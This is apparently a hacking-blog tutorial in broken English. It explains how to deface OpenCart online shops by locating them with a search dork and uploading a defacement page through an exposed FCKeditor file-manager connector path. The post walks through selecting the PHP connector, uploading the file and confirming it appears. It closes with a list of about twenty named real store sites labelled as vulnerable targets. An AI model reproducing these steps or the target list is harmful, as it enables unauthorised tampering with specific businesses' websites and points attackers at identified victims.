Website defacement With OpenCart andy_willyam rwxr-xr-x 0 8:46 AM

Filename	Website defacement With OpenCart
Permission	rw-r--r--
Author	andy_willyam
Date and Time	8:46 AM
Label
Action

immediately wrote…
dork : Powered By Yhonezz CyberArt
“site:” up, the important support OpenCart
ex target: http://www.planespares.com/
can also reply with a target www.target.com/pacth/ it can target an ad in the / patch / her
ex: http://www.target.com/patch/
if already can target, we inject the exploit immediately wrote his
for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
this would
ex: http://www.planespares.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
if existing target /patch/ , inject his patch behind her
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
look out, there are places her file upload ... ..
connector select PHP
We immediately wrote our deface html file upload ...
if successful it will come out like this alert
Code:
“file uploaded with no errors”
see our files, whether it has been uploaded by clicking “Get Folders and Files”
now see the results ....
ex outcome: http://www.planespares.com/Katonnightmare.html
file that we unfortunately can not upload the file before befallen her, but the duplicate files ... files(1).html or file(2).html..
Many Site Here - his site Vuln :
List of websites that Vulnerable : 

1. http://www.xuhongmrw.com/theanimeshop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
2. http://www.ugsdeportes.com.ar//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
3. http://vinosysaboresdelsol.com.ar/catalogo/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
4. http://www.dacdisenios.com.ar/tienda//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
5. http://www.lubetlenceria.com/ventas/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
6. http://www.ugsdeportes.com.ar/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
7. http://www.dacdisenios.com.ar/tienda/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
8. http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
9. http://www.ottimotohk.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
10. http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
11. http://www.brooktroutstore.com.hk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
12.  http://www.karens-shop.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
13. http://hana-yi.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
14. http://www.xpalpower.com.tw/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
15. http://www.thespaberry.com/store//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
16. http://www.fresh89.com/swag/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
17. http://www.connectix.ca/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
18. http://baliclothingexporter.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
19. http://www.binksyandbobo.com/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
20.  http://thebestnetbook.net/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Courtesy By http://cyber4rt.blog.com/author/yhonezz_vanhecsalt/